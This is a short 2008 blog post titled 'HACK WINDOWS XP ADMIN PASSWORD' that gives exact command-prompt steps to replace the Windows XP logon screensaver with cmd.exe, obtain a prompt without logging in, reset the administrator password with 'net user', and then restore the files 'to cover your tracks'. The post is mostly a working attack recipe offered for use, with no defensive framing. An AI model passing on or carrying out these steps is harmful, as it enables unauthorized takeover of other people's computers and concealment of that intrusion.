GET FIREFOX

Thursday, July 31, 2008

HACK WINDOWS XP ADMIN PASSWORD

Well you might be unable to get the admin password but you can surely reset it to your liking.
follow these steps.

Log in and go to your DOS command prompt and enter these commands exactly:

cd\
cd\windows\system32
mkdir xphack
copy logon.scr xphack\logon.scr
copy cmd.exe xphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit

So what you just told windows to backup is the command program and the screen saver file. Then you edited the settings so when windows loads the screen saver, you will get an unprotected dos prompt without logging in. When this appears enter this command that’s in parenthesis (net user password). So if the admin user name is ouradmin and you want the password 1234 then you would enter “net user ouradmin 1234″ and now you’ve changed the admin password to 1234. Log in, do what you want to do, copy the contents of xphack back into system32 to cover your tracks

No comments: